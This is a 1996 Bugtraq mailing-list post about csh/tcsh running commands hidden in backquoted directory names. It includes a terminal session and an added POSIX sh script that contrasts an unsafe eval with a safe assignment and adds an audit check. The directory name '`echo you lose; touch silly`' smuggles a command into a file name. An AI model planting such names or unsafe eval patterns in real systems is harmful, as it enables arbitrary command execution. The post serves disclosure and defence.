Bugtraq mailing list archives

Re: tee see shell problems


From: szabo_p () maths su oz au (Paul Szabo)
Date: Wed, 18 Sep 1996 10:44:09 +1000


A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
out with BSDI anyway.) that allows the execution of arbitrary commands
when changing into directories that are enclosed with backticks.

It seems to me that the problem may be with the way you define your cd
command: surely it is the expansion of $cwd, if containing backquotes, that
does the damage. (csh is known to do several passes of variable and command
substitution.) I have the following under /bin/csh, both with Apollo
Domain/OS and DEC Alpha OSF/1 (dUNIX v3.2 or v4.0):

tmp% pwd
/tmp
tmp% which cd
alias/cd 'chdir !*; set prompt="$cwd:t% "'
tmp% mkdir '`echo you lose; touch silly`'
tmp% ls -l
total 1
drwx------   2 psz      system       512 Sep 18 10:28 `echo you lose; touch silly`
tmp% cd *echo*
you lose% pwd
/tmp/`echo you lose; touch silly`
you lose% ls -l
total 0
-rw-------   1 psz      system         0 Sep 18 10:28 silly

Paul Szabo - System Manager   //        School of Mathematics and Statistics
psz () maths usyd edu au         //   University of Sydney, NSW 2006, Australia
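
Added example, not part of the original post: the second expansion pass described above, reproduced as a POSIX sh analogue in which eval stands in for csh re-parsing the alias text (an assumption made for illustration, not csh's own code path). The function names are hypothetical, and the directory name is the one from the session above, created in a scratch directory.

```shell
#!/bin/sh
# Added illustration: a POSIX sh analogue of the csh behaviour in the post.
# Function names are hypothetical; the directory name is the one from the post.

# Unsafe: the name is pasted into text that the shell parses a second time
# (eval), so backquotes inside it run, as with $cwd in the csh alias.
prompt_unsafe() {
    tail=${PWD##*/}
    eval "prompt=\"$tail% \""
    printf '%s\n' "$prompt"
}

# Safe: the name is only ever assigned as data and never re-parsed.
prompt_safe() {
    prompt="${PWD##*/}% "
    printf '%s\n' "$prompt"
}

# Audit: list directories under $1 whose names contain a backquote or '$'.
risky_dirs() {
    find "$1" -type d \( -name '*`*' -o -name '*$*' \) -print
}

demo() {
    work=$(mktemp -d) || return 1
    dir="$work/"'`echo you lose; touch silly`'
    mkdir "$dir"
    printf 'flagged: %s\n' "$(risky_dirs "$work")"
    printf 'safe:    %s\n' "$(cd "$dir" && prompt_safe)"
    printf 'unsafe:  %s\n' "$(cd "$dir" && prompt_unsafe)"
    ls "$dir"    # "silly" was created by the unsafe call only
    rm -rf "$work"
}
demo
```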


